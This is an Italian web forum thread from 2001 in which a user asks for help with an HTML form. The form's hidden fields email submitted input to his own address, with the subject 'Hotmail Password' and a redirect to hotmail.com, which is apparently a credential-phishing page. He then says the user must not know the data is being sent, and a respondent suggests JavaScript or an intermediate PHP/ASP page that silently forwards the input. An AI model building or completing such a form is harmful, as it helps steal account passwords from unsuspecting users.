Telefonino.net network
 
| HOMEPAGE | INDICE FORUM | REGOLAMENTO | ::. NEI PREFERITI .:: | RSS Forum | RSS News | NEWS web | NEWS software |
| PUBBLICITA' | | ARTICOLI | WIN XP | VISTA | WIN 7 | REGISTRI | SOFTWARE | MANUALI | RECENSIONI | LINUX | HUMOR | HARDWARE | DOWNLOAD | | CERCA nel FORUM » |

Torna indietro   WinTricks Forum > Software > Programmazione

Notices

Rispondi
 
Strumenti discussione
Vecchio 31-10-2001, 09.37.10   #1
mikelee
Senior Member
 
L'avatar di mikelee
 
Registrato: 22-11-2000
Loc.: Bari
Messaggi: 295
mikelee promette bene
HTML spiegazone

<form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi" target="_top"><input type=hidden name="recipient" value="mikelee@tiscalinet.it"><input TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com"><input TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><input type="hidden" name="redirect" value="http://www.hotmail.com">

Cosa indicano queste righe e cosa fanno??
In special modo mi servirebbe capire questa:

<form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi" target="_top">

e se è possibile cambiare la destinazione e come.
Grazie
mikelee non è collegato   Rispondi citando
Vecchio 31-10-2001, 12.10.46   #2
quipo.it
WT Assistant
 
L'avatar di quipo.it
 
Registrato: 19-12-2000
Loc.: Cambiano (Torino)
Messaggi: 591
quipo.it promette bene
Semplicemente prende le variabili ottenute con i tag di input e le passa da processare alla pagina indicata (nel tuo caso http://www.tiscalinet.it/cgi-bin/formmail.cgi). Se vuoi reindirizzare altrove tali dati basta cambiare l'indirizzo suddetto, anche se francamente non vedo perché dovresti farlo... La pagina in questione sarà pur stata creata per qualche motivo, no?
quipo.it non è collegato   Rispondi citando
Vecchio 31-10-2001, 16.13.47   #3
Gidessì
Newbie
 
L'avatar di Gidessì
 
Registrato: 30-09-2001
Loc.: Villacidro (CA)
Messaggi: 44
Gidessì promette bene
cambiare gli indirizzi servirebbe solo a restituirti un errore da un server. gli input inviati sono sempre variabili che chiamano un'applicazione ben definita (in perl, in php, in ASP) indirizzarli ad un'altra destinazione non darebbero alcun risultato
___________________________________

http://web.tiscali.it/ipsavillacidro/about.htm
Gidessì non è collegato   Rispondi citando
Vecchio 31-10-2001, 16.20.10   #4
mikelee
Senior Member
 
L'avatar di mikelee
 
Registrato: 22-11-2000
Loc.: Bari
Messaggi: 295
mikelee promette bene
Volevo che facesse questo....

Praticamente vorrei che i dati immessi in imput mi siano inviati via mail all'indirizzo da me settato.
Solo che così facendo (ovvero come scritto sopra) non funziona.
I dati immessi non ritornano nella casella selezionata a caso nei settaggi.
Potreste aiutarmi in tal senso?
mikelee non è collegato   Rispondi citando
Vecchio 31-10-2001, 17.17.52   #5
quipo.it
WT Assistant
 
L'avatar di quipo.it
 
Registrato: 19-12-2000
Loc.: Cambiano (Torino)
Messaggi: 591
quipo.it promette bene
Beh, se vuoi solo mandare alla tua casella e-mail i dati ottenuti con gli INPUT, tutto quel che devi fare è usare la sintassi: <form method="POST" action="mailto:tuamail@tuoprovider.it" ENCTYPE="application/x-www-form-urlencoded">, e poi eventualmente processare il messaggio che ti arriva nella casella per renderlo un po' più umanamente leggibile... Spero di aver capito bene, stavolta...
quipo.it non è collegato   Rispondi citando
Vecchio 31-10-2001, 18.12.28   #6
mikelee
Senior Member
 
L'avatar di mikelee
 
Registrato: 22-11-2000
Loc.: Bari
Messaggi: 295
mikelee promette bene
Ebbè...sennò...

Ciò che dici funziona a meraviglia ma c'è un piccolo inconveniente....

L'utente non deve sapere che sta spedendo via e-mail i dati di input!!
Così come hai scritto i tag l'utente invia e sa di inviare via mail quei dati.....
Hai idee???
Mikelee
mikelee non è collegato   Rispondi citando
Vecchio 01-11-2001, 17.49.56   #7
quipo.it
WT Assistant
 
L'avatar di quipo.it
 
Registrato: 19-12-2000
Loc.: Cambiano (Torino)
Messaggi: 591
quipo.it promette bene
Quota:
L'utente non deve sapere che sta spedendo via e-mail i dati di

input!!
Beh, questo non l'avevi detto! Cmq, in pratica ti servirebbe lanciare due

azioni con un solo click... con una mandi i dati alla pagina desiderata, e

con l'altra li mandi alla casella e-mail... per quanto ne so questo non è

possibile in HTML puro, dovresti ricorrere a js... però in tal caso è

difficile che l'utente non si accorga di quanto succede... oppure crei una

pagina intermedia (in PHP o ASP) che raccolga le variabili e le inoltri

alle due destinazioni in modo automatico.
quipo.it non è collegato   Rispondi citando
Rispondi


Utenti attualmente attivi che stanno leggendo questa discussione: 1 (0 utenti e 1 ospiti)
 
Strumenti discussione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is ON
Gli smilies sono ON
[IMG] è ON
Il codice HTML è OFF

Vai al forum

Orario GMT +2. Ora sono le: 17.55.27.


E' vietata la riproduzione, anche solo in parte, di contenuti e grafica.
Copyright © 1999-2017 Edizioni Master S.p.A. p.iva: 02105820787 • Tutti i diritti sono riservati
L'editore NON si assume nessuna responsabilità dei contenuti pubblicati sul forum in quanto redatti direttamente dagli utenti.
Questi ultimi sono responsabili dei contenuti da loro riportati nelle discussioni del forum
Powered by vBulletin - 2010 Copyright © Jelsoft Enterprises Limited.